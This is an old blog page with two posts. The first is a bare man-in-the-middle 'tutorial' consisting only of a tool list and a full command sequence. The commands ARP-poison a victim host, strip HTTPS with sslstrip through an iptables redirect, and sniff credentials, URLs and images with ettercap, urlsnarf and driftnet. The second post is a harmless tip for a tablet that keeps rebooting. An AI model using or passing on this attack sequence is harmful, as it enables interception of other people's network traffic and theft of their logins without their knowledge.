Exploit-DB updates

Friday, November 26, 2010

Man In The Middle tutorial - SSLStrip and Arp Poisoning.




Linux Distro
Tools used
  • Ettercap
  • SSLStrip
  • Dsniff suite (URLSnarf)
  • Driftnet
  • Arpspoof
  • fping
  • nano
Commands
  • nano /etc/etter.conf
  • fping -a -g 192.168.1.9 192.168.1.1 -s >hosts
  • sslstrip -a -k -f
  • iptables -t nat -A PREROUTING -p tcp --destination-port  80 -j REDIRECT --to-ports 10000
  • echo "1" > /proc/sys/net/ipv4/ip_forward
  • arpspoof -i wlan0 -t 192.168.1.9 192.168.1.1
  • ettercap -Tq -L etterlogs -i wlan0
  • urlsnarf -vvv -i wlan0
  • driftnet -v -i wlan0 

Tuesday, November 23, 2010

A possible fix for hopeless Archos7's that wont stop restarting

Well I recently had a Archos7 that would not stop resetting when I booted it. The damn thing would reboot the second I touched the screen, and in some cases before it could even boot. I'm not sure if this will solve others problems but I simply put a new rom (Update.img) on an SD card and the moment it booted (took a few tries) I slipped the card in and quickely hit the Update button before it had the chance to reboot and just like that, it worked perfectely.